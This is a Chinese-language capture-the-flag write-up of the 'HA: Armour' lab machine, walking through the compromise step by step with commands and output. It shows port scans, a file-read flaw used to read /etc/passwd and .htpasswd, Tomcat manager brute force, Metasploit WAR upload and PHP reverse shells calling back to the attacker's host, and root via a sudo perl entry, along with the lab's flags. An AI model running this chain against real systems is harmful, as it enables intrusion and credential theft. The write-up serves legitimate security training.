HA: Armour-Write-up


下载地址:点我

bilibili:点我

信息收集

  • nmap扫存活找到IP为:192.168.116.140
➜  ~ nmap -sn 192.168.116.1/24      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:21 CST
Nmap scan report for 192.168.116.1
Host is up (0.00031s latency).
Nmap scan report for 192.168.116.140
Host is up (0.00074s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.09 seconds
➜  ~ nmap -A -T4 192.168.116.140 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:23 CST
Nmap scan report for 192.168.116.140
Host is up (0.0018s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Armour
8009/tcp  open  ajp13   Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp  open  http    Apache Tomcat 9.0.24
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
65534/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 28:eb:55:eb:a6:63:c6:fd:23:36:31:27:de:cb:f8:0d (RSA)
|   256 a5:1b:86:a9:66:3e:b6:e6:af:d4:33:fe:2c:84:3b:62 (ECDSA)
|_  256 c7:b2:0c:45:7f:9c:a2:98:fb:52:75:0d:0d:e1:1f:24 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
➜  ~
  • 开放80,8009,8080端口,都是Web服务分别是Apache httpd,Apache Jserv和Apache Tomcat,还有一个65534端口为ssh服务。
  • 指定端口连接ssh,得到第一个flag:HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA},和提示:TheOlympics
➜  ~ ssh 192.168.116.140 -p65534      
The authenticity of host '[192.168.116.140]:65534 ([192.168.116.140]:65534)' can't be established.
ECDSA key fingerprint is SHA256:kYh7ax5tplAJb0W9IkeVePlscYpVFgSLsyepRlFi20A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.116.140]:65534' (ECDSA) to the list of known hosts.

                                                                                             
       db         88888888ba   88b           d88    ,ad8888ba,    88        88  88888888ba   
      d88b        88      "8b  888b         d888   d8"'    `"8b   88        88  88      "8b  
     d8'`8b       88      ,8P  88`8b       d8'88  d8'        `8b  88        88  88      ,8P  
    d8'  `8b      88aaaaaa8P'  88 `8b     d8' 88  88          88  88        88  88aaaaaa8P'  
   d8YaaaaY8b     88""""88'    88  `8b   d8'  88  88          88  88        88  88""""88'    
  d8""""""""8b    88    `8b    88   `8b d8'   88  Y8,        ,8P  88        88  88    `8b    
 d8'        `8b   88     `8b   88    `888'    88   Y8a.    .a8P   Y8a.    .a8P  88     `8b   
d8'          `8b  88      `8b  88     `8'     88    `"Y8888Y"'     `"Y8888Y"'   88      `8b  
                                                                                             
                                                                                             
                                www.hackingarticles.in

                 HulkBuster Armour:{7BDA7019C06B53AEFC8EE95D2CDACCAA}
                        
                              Hint 1: TheOlympics

kali-team@192.168.116.140's password:
  • 浏览器访问80端口,F12发现注释里有armour,notes.txt,还有69,开始不知道什么意思。但是对TCP/UDP端口列表熟悉的话,可以猜出来是TFTP(小型文件传输协议)的端口,详细TCP/UDP端口列表
  • 可以使用nmap加UDP协议判断69端口是否开放。
➜  ~ sudo  nmap -sU -p69 192.168.116.140
[sudo] kali-team 的密码:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-09 21:38 CST
Nmap scan report for 192.168.116.140
Host is up (0.00073s latency).

PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:E7:98:9F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.92 seconds
  • 因为要发送UDP报文,所以要加sudo以Root权限执行。发现目标有开放69端口。
  • TFTP客户端连上服务端下载notes.txt文件,得到第二个flag。
➜  ~ atftp                
tftp> connect 192.168.116.140
tftp> get notes.txt
tftp> quit 
➜  ~ cat notes.txt
Spiderman Armour:{83A75F0B31435193BAFD3B9C5FD45AEC}

Hint 2: maybeevena
➜  ~
  • 还有一个提示maybeevena,不知道什么鬼。先爆破80端口的php后缀文件。
➜  ~ dirb http://192.168.116.140 -X .php

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Oct  9 22:23:10 2019
URL_BASE: http://192.168.116.140/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.116.140/ ----
+ http://192.168.116.140/file.php (CODE:200|SIZE:0)                                                                                                                                                                                           
                                                                                                                                                                                                                                              
-----------------
END_TIME: Wed Oct  9 22:23:13 2019
DOWNLOADED: 4612 - FOUND: 1
➜  ~
  • 找到file.php,打开页面一片空白,fuzz参数。
➜  ~ wfuzz -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt --hw 0 'http://192.168.116.140/file.php?FUZZ=/etc/passwd' 
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://192.168.116.140/file.php?FUZZ=/etc/passwd
Total requests: 77

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
===================================================================

000000033:   200        28 L     36 W     1437 Ch     "file"                                                                                                                                                                        

Total time: 0.130840
Processed Requests: 77
Filtered Requests: 76
Requests/sec.: 588.5036

➜  ~
  • 找到参数为file,还是一个文件读取漏洞,因为是Apache的服务,所以先想到读取Apache相关的文件,敏感的文件有.htpasswd,一般在/etc/apache2/.htpasswd
➜  ~ curl http://192.168.116.140/file.php\?file\=/etc/apache2/.htpasswd                      
Ant-Man Armour:{A9F56B7ECE2113C9C4A1214A19EDE99C}


Hint 3: StarBucks
➜  ~
  • 找到第三个flag,和第三个提示:StarBucks。
  • 官方提示:

P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

  • 三个提示拼起来就是:TheOlympics maybeevena starBucks,强行当密码。

tomcat 获取会话

  • 浏览器打开8080端口,发现是一个Tomcat的管理页面,密码已经知道,现在来爆破用户名。
➜  CeWL git:(master) ✗ ./cewl.rb -v  http://192.168.116.140 -d 10 -w dict.txt 
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://192.168.116.140
Visiting: http://192.168.116.140, got response code 200
Attribute text found:


Offsite link, not following: https://hackingarticles.in
Writing words to file
➜  CeWL git:(master) ✗ cat dict.txt           
Armour
PAGE
CONTENT
Header
ARMOUR
Collection
Armours
MCU
Photo
Grid
armour
End
Page
Content
Footer
Powered
Hacking
Articles
notes
txt
➜  CeWL git:(master) ✗ pwd               
/home/kali-team/Kali-Team_Tools/CeWL
➜  CeWL git:(master) ✗
  • 使用CeWL爬80端口的网页生成用户名的字典,使用MSF对Tomcat进行登录密码枚举。
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options 

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                 Required  Description
   ----              ---------------                                                 --------  -----------
   BLANK_PASSWORDS   true                                                            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                           no        Add all users in the current database to the list
   PASSWORD          TheOlympicsmaybeevenaStarBucks                                  no        The HTTP password to specify for authentication
   PASS_FILE         /opt/metasploit/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.116.140                                                 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             8080                                                            yes       The target port (TCP)
   SSL               false                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                               yes       The number of concurrent threads
   USERNAME                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /opt/metasploit/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                           no        Try the username as the password for all users
   USER_FILE         /home/kali-team/Kali-Team_Tools/CeWL/dict.txt                   no        File containing users, one per line
   VERBOSE           true                                                            yes       Whether to print output for all attempts
   VHOST                                                                             no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) >
  • 不知道为什么,我重启服务器后才枚举出来,用户名是:armour。
  • [+] 192.168.116.140:8080 - Login Successful: armour:TheOlympicsmaybeevenaStarBucks
  • Tomcat上传木马有很多方法,可以手工上传WAR文件部署。
  • 这里就使用MSF比较省时间。
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword                                                                                                                                                                                  
set httppassword  
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword TheOlympicsmaybeevenaStarBucks
httppassword => TheOlympicsmaybeevenaStarBucks
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername armour
httpusername => armour
msf5 exploit(multi/http/tomcat_mgr_upload) > run 

[*] Started reverse TCP handler on 192.168.116.1:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying wJ0oIWvcGX...
[*] Executing wJ0oIWvcGX...
[*] Undeploying wJ0oIWvcGX ...
[*] Sending stage (53867 bytes) to 192.168.116.140
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.140:50706) at 2019-10-09 23:47:49 +0800

meterpreter >
  • 枚举本地开发端口
meterpreter > shell 
Process 61 created.
Channel 75 created.
netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:65534           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::8080                 :::*                    LISTEN      572/java            
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::65534                :::*                    LISTEN      -                   
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      572/java            
tcp6       0      0 :::8009                 :::*                    LISTEN      572/java            
tcp6       0      0 192.168.116.140:50706   192.168.116.1:4444      ESTABLISHED 685/java
  • 这里发现目标主机上监听着8081端口,只能在目标本地进行访问,所以我们可以把端口转发出来,MSF里有自带的。
meterpreter > portfwd /?
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to.
meterpreter > portfwd add -l 8081 -p 8081 -r 127.0.0.1
[*] Local TCP relay created: :8081 <-> 127.0.0.1:8081
meterpreter >
  • 现在访问自己的8081端口就可以拿到第四个flag。
➜  ~ curl http://127.0.0.1:8081                                        
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
  • 或者直接在目标主机访问
tomcat@ubuntu:~$ cd /tmp
cd /tmp
tomcat@ubuntu:/tmp$ wget http://127.0.0.1:8081
wget http://127.0.0.1:8081
--2019-10-10 04:46:42--  http://127.0.0.1:8081/
Connecting to 127.0.0.1:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 56 [text/html]
Saving to: ‘index.html’

index.html          100%[===================>]      56  --.-KB/s    in 0s      

2019-10-10 04:46:42 (2.79 MB/s) - ‘index.html’ saved [56/56]

tomcat@ubuntu:/tmp$ cat index.html
cat index.html
Black Panther Armour:{690B4BAC6CA9FB81814128A294470F92}
tomcat@ubuntu:/tmp$

权限提升

  • 查找GUID文件
tomcat@ubuntu:/$ find / -perm -g=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
/sbin/pam_extrausers_chkpwd
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/expiry
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/wall
/usr/bin/bsd-write
/usr/bin/mlocate
tomcat@ubuntu:/$
  • 查找SUID文件
tomcat@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/bin/ping
/bin/fusermount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
tomcat@ubuntu:/$ 
tomcat@ubuntu:/$ find / -perm -4000 2>dev/null | xargs ls -la
find / -perm -4000 2>dev/null | xargs ls -la
-rwsr-xr-x 1 root root        30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root        43088 Oct 15  2018 /bin/mount
-rwsr-xr-x 1 root root        64424 Jun 28 04:05 /bin/ping
-rwsr-xr-x 1 root root        44664 Mar 22  2019 /bin/su
-rwsr-xr-x 1 root root        26696 Oct 15  2018 /bin/umount
-rwsr-xr-x 1 root root        76496 Mar 22  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root        44528 Mar 22  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root        75824 Mar 22  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        40344 Mar 22  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root        59640 Mar 22  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root       149080 Jan 17  2018 /usr/bin/sudo
-rwsr-xr-x 1 root root        18448 Jun 28 04:05 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root        10312 May 14 00:07 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root messagebus  42992 Jun 10 11:05 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root       436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
tomcat@ubuntu:/$
  • 查找可写目录,发现有/var/www/html
tomcat@ubuntu:/$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/dev/mqueue
/dev/shm
/tftpboot
/var/lib/php/sessions
/var/www/html
/var/tmp
/proc/902/task/902/fd
/proc/902/fd
/proc/902/map_files
/tmp
  • 查找root用户权限可写文件
tomcat@ubuntu:/$ find / -writable -type f 2>/dev/null | grep -v "/proc/" |xargs ls -al |grep root
<ev/null | grep -v "/proc/" |xargs ls -al |grep root
-rwxrwxrwx 1 root   root     7224 Sep 21 11:30 /etc/apache2/apache2.conf
-rwxrwxrwx 1 root   tomcat   2262 Sep 21 21:15 /opt/tomcat/conf/tomcat-users.xml
--w--w--w- 1 root   root        0 Oct 10 02:00 /sys/fs/cgroup/memory/cgroup.event_control
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.access
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root   root        0 Oct 10 01:09 /sys/kernel/security/apparmor/.replace
tomcat@ubuntu:/$
  • 找到/etc/apache2/apache2.conf/opt/tomcat/conf/tomcat-users.xml文件可写。
  • /opt/tomcat/conf/tomcat-users.xml只有之前的账号密码,只能看/etc/apache2/apache2.conf文件了。
  • 查找passwd文件,每行记录又被冒号(:)分隔为7个字段分别对应:用户名:口令:用户标识号:组标识号:注释性描述:主目录:登录Shell
  • group文件对应:组名:口令:组标识号:组内用户列表
tomcat@ubuntu:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
armour:x:1000:1000:armour,,,:/home/armour:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
tomcat:x:1001:1001::/opt/tomcat:/bin/false
aarti:x:1002:1002:,,,:/home/aarti:/bin/bash
tomcat@ubuntu:/$ 


tomcat@ubuntu:~$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,armour
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:armour
floppy:x:25:
tape:x:26:
sudo:x:27:armour
audio:x:29:
dip:x:30:armour
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:armour
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-network:x:102:
systemd-resolve:x:103:
input:x:104:
crontab:x:105:
syslog:x:106:
messagebus:x:107:
mlocate:x:108:
uuidd:x:109:
ssh:x:110:
armour:x:1000:
lpadmin:x:111:armour
sambashare:x:112:armour
ssl-cert:x:113:
tomcat:x:1001:
aarti:x:1002:
tomcat@ubuntu:~$
  • 找到一个普通用户aarti和armour
  • 把Apache配置文件下载到自己的电脑,Apache默认以www-data用户启动的
http://192.168.116.140/file.php?file=/etc/apache2/apache2.conf
  • 修改用户和组,让Apache以上面那个普通用户启动,为什么不能以Root用户启动能?因为不重新编译是不能用Root权限的,这样Web服务也起不来。所以只能改aarti的
  • 覆盖Apache配置文件
tomcat@ubuntu:/etc/apache2$ wget http://192.168.116.1:8000/apache2.conf -O apache2.conf
<p://192.168.116.1:8000/apache2.conf -O apache2.conf
--2019-10-10 04:52:49--  http://192.168.116.1:8000/apache2.conf
Connecting to 192.168.116.1:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7195 (7.0K) [text/plain]
Saving to: ‘apache2.conf’

apache2.conf        100%[===================>]   7.03K  --.-KB/s    in 0s      

utime(apache2.conf): Operation not permitted
2019-10-10 04:52:49 (243 MB/s) - ‘apache2.conf’ saved [7195/7195]

tomcat@ubuntu:/etc/apache2$ cat apache2.conf
  • 写入后到80端口服务下的目录写木马。(这是官方出题人写的),我试了不对,创建文件的用户为Tomcat,aarti用户读不了这个文件,所以是访问不了的,服务端报500错误。
  • 后来我利用文件包含Apache的配置文件获取到了会话。
  • 就是把Shell写进Apache2.conf,再利用上面发现的文件包含漏洞。
➜  ~ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
➜  ~ cat shell.php >> apache2.conf 

msf5 exploit(multi/handler) > run 

[*] Started reverse TCP handler on 192.168.116.1:2333 
[*] Sending stage (38288 bytes) to 192.168.116.140
[*] Meterpreter session 3 opened (192.168.116.1:2333 -> 192.168.116.140:48606) at 2019-10-10 13:22:53 +0800

meterpreter > getuid 
Server username: aarti (1002)
meterpreter > shell 
Process 12388 created.
Channel 0 created.
python3.6 -c 'import pty;pty.spawn("/bin/bash")'
aarti@ubuntu:/var/www/html$ whoami
whoami
aarti
aarti@ubuntu:/var/www/html$

提Root权限

  • 列举无密码sudo,发现有一个perl
aarti@ubuntu:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for aarti on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aarti may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/perl
aarti@ubuntu:/var/www/html$ 
aarti@ubuntu:/var/www/html$ sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/bash";'
root@ubuntu:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/var/www/html# 
root@ubuntu:~# ls
ls
final.txt
root@ubuntu:~# cat final.txt
cat final.txt

         ______   ______    _____   _     _  ______  
   /\   (_____ \ |  ___ \  / ___ \ | |   | |(_____ \ 
  /  \   _____) )| | _ | || |   | || |   | | _____) )
 / /\ \ (_____ ( | || || || |   | || |   | |(_____ ( 
| |__| |      | || || || || |___| || |___| |      | |
|______|      |_||_||_||_| \_____/  \______|      |_|
                                                     

    IronMan Armour:{3AE9D8799D1BB5E201E5704293BB54EF}


!! Congrats you have finished this task !!
							
Contact us here:
								
Hacking Articles : https://twitter.com/rajchandel/
		
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
	
+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+	
root@ubuntu:~#
posted @ 2020-01-19 09:25  三米前有蕉皮  阅读(...)  评论(...编辑  收藏